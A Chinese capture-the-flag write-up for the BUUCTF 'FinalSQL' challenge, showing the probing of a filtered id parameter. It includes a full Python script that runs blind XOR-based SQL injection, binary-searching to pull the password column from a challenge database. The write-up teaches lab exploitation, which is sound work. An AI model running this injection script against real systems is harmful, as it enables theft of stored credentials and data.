sql注入 [极客大挑战 2019]FinalSQL1

打开题目

点击1到5号的结果

1号

2号

3号

4号

5号

这里直接令传入的id=6

传入id=1^1^1

逻辑符号|会被检测到,而&感觉成了注释符,&之后的内容都被替换掉了。

传入id=1|1

直接盲注比较慢,还需要利用二分法来编写脚本

这里利用到大佬的脚本

复制代码
import requests


url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php"
flag = ''

def payload(i, j):
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

运行一下得到flag

得到flag

参考文章:

[极客大挑战 2019]FinalSQL 1-CSDN博客

https://www.cnblogs.com/Article-kelp/p/14651000.html

相关推荐
范特西林2 小时前
实战演练——从零实现一个高性能 Binder 服务
android
范特西林3 小时前
代码的生成:AIDL 编译器与 Parcel 的序列化艺术
android
范特西林3 小时前
深入内核:Binder 驱动的内存管理与事务调度
android
范特西林4 小时前
解剖麻雀:Binder 通信的整体架构全景图
android
范特西林4 小时前
破冰之旅:为什么 Android 选择了 Binder?
android
奔跑中的蜗牛6665 小时前
一次播放器架构升级:Android 直播间 ANR 下降 60%
android
测试工坊7 小时前
Android 视频播放卡顿检测——帧率之外的第二战场
android
Kapaseker9 小时前
一杯美式深入理解 data class
android·kotlin
鹏多多9 小时前
Flutter使用screenshot进行截屏和截长图以及分享保存的全流程指南
android·前端·flutter
Carson带你学Android9 小时前
OpenClaw移动端要来了?Android官宣AI原生支持App Functions
android